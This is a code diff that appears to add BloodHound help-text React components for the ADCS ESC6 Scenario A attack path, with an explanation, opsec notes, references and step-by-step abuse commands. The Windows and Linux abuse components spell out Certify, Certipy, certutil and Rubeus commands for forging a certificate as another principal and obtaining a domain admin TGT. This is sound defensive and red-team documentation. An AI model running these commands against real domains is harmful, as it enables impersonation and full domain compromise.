Esc6a finding entity panel

packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/ADCSESC6a.tsx

@@ -0,0 +1,31 @@
+// Copyright 2024 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import General from './General';
+import WindowsAbuse from './WindowsAbuse';
+import LinuxAbuse from './LinuxAbuse';
+import Opsec from './Opsec';
+import References from './References';
+
+const ADCSESC6a = {
+    general: General,
+    windowsAbuse: WindowsAbuse,
+    linuxAbuse: LinuxAbuse,
+    opsec: Opsec,
+    references: References,
+};
+
+export default ADCSESC6a;

packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/General.tsx

@@ -0,0 +1,44 @@
+// Copyright 2024 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { groupSpecialFormat } from '../utils';
+import { EdgeInfoProps } from '../index';
+import { Typography } from '@mui/material';
+
+const General: FC<EdgeInfoProps> = ({ sourceName, sourceType, targetName }) => {
+    return (
+        <>
+            <Typography variant='body2'>
+                {groupSpecialFormat(sourceType, sourceName)} the privileges to perform the ADCS ESC6 Scenario A attack
+                against the target domain.
+            </Typography>
+            <Typography variant='body2'>
+                The principal has permission to enroll on one or more certificate templates allowing for authentication.
+                They also have enrollment permission for an enterprise CA with the necessary templates published. This
+                enterprise CA is trusted for NT authentication in the forest, and chains up to a root CA for the forest.
+                The enterprise CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag allowing enrollees to
+                specify a Subject Alternate Name (SAN) identifying another principal during certificate enrollment of
+                any published certificate template. This setup allow an attacker principal to obtain a malicious
+                certificate as another principal. There is an affected Domain Controller configured to allow weak
+                certificate binding enforcement, which enables the attacker principal to authenticate with the malicious
+                certificate and thereby impersonating any AD forest user or computer without their credentials.
+            </Typography>
+        </>
+    );
+};
+
+export default General;

packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/LinuxAbuse.tsx

@@ -0,0 +1,42 @@
+// Copyright 2024 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const LinuxAbuse: FC = () => {
+    return (
+        <>
+            <Typography variant='body2'>An attacker may perform this attack in the following steps:</Typography>
+            <Typography variant='body2'>
+                <b>Step 1</b>: Use Certipy to request enrollment in the affected template, specifying the affected
+                enterprise CA and target principal to impersonate:
+            </Typography>
+            <Typography component={'pre'}>
+                {
+                    'certipy req -u [email protected] -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC6 -upn [email protected]'
+                }
+            </Typography>
+            <Typography variant='body2'>
+                <b>Step 2</b>: Request a ticket granting ticket (TGT) from the domain, specifying the certificate
+                created in Step 1 and the IP of a domain controller:
+            </Typography>
+            <Typography component={'pre'}>{'certipy auth -pfx administrator.pfx -dc-ip 172.16.126.128'}</Typography>
+        </>
+    );
+};
+
+export default LinuxAbuse;

packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/Opsec.tsx

@@ -0,0 +1,31 @@
+// Copyright 2024 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const Opsec: FC = () => {
+    return (
+        <Typography variant='body2'>
+            When the affected certificate authority issues the certificate to the attacker, it will retain a local copy
+            of that certificate in its issued certificates store. Defenders may analyze those issued certificates to
+            identify illegitimately issued certificates and identify the principal that requested the certificate, as
+            well as the target identity the attacker is attempting to impersonate.
+        </Typography>
+    );
+};
+
+export default Opsec;

packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/References.tsx

@@ -0,0 +1,47 @@
+// Copyright 2024 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Link, Box } from '@mui/material';
+
+const References: FC = () => {
+    return (
+        <Box sx={{ overflowX: 'auto' }}>
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf'>
+                Certified Pre-Owned
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7'>
+                Certipy 4.0
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#editf_attributesubjectaltname2-esc6'>
+                Domain Escalation Edit Attributes
+            </Link>
+        </Box>
+    );
+};
+
+export default References;

packages/javascript/bh-shared-ui/src/components/HelpTexts/ADCSESC6a/WindowsAbuse.tsx

@@ -0,0 +1,52 @@
+// Copyright 2024 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { FC } from 'react';
+import { Typography } from '@mui/material';
+
+const WindowsAbuse: FC = () => {
+    return (
+        <>
+            <Typography variant='body2'>An attacker may perform this attack in the following steps:</Typography>
+            <Typography variant='body2'>
+                <b>Step 1</b>: Use Certify to request enrollment in the affected template, specifying the affected
+                enterprise CA and target principal to impersonate:
+            </Typography>
+            <Typography component={'pre'}>
+                {
+                    '.\\Certify.exe request /ca:rootdomaindc.forestroot.com\\forestroot-RootDomainDC-CA /template:ESC6 /altname:forestroot\\ForestRootDA'
+                }
+            </Typography>
+            <Typography variant='body2'>
+                <b>Step 2</b>: Convert the emitted certificate to PFX format:
+            </Typography>
+            <Typography component={'pre'}>{'certutil.exe -MergePFX .cert.pem .cert.pfx'}</Typography>
+            <Typography variant='body2'>
+                <b>Step 3</b>: Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the
+                target identity to impersonate and the PFX-formatted certificate created in Step 2:
+            </Typography>
+            <Typography component={'pre'}>
+                {'.\\Rubeus.exe asktgt /certificate:cert.pfx /user:”forestroot\\forestrootda” /password:asdf /ptt'}
+            </Typography>
+            <Typography variant='body2'>
+                <b>Step 4</b>: Optionally verify the TGT by listing it with the klist command:
+            </Typography>
+            <Typography component={'pre'}>{'klist'}</Typography>
+        </>
+    );
+};
+
+export default WindowsAbuse;

packages/javascript/bh-shared-ui/src/components/HelpTexts/index.tsx

@@ -1,4 +1,4 @@
-// Copyright 2023 Specter Ops, Inc.
+// Copyright 2024 Specter Ops, Inc.
 //
 // Licensed under the Apache License, Version 2.0
 // you may not use this file except in compliance with the License.
@@ -107,6 +107,7 @@ import WritePKIEnrollmentFlag from './WritePKIEnrollmentFlag/WritePKIEnrollmentF
 import WritePKINameFlag from './WritePKINameFlag/WritePKINameFlag';
 import WriteSPN from './WriteSPN/WriteSPN';
 import ADCSESC1 from './ADCSESC1/ADCSESC1';
+import ADCSESC6a from './ADCSESC6a/ADCSESC6a';
 import ADCSESC6b from './ADCSESC6b/ADCSESC6b';
 
 export type EdgeInfoProps = {
@@ -208,6 +209,7 @@ const EdgeInfoComponents = {
     GoldenCert: GoldenCert,
     ADCSESC1: ADCSESC1,
     ADCSESC3: ADCSESC3,
+    ADCSESC6a: ADCSESC6a,
     ADCSESC6b: ADCSESC6b,
     ManageCA: ManageCA,
     ManageCertificates: ManageCertificates,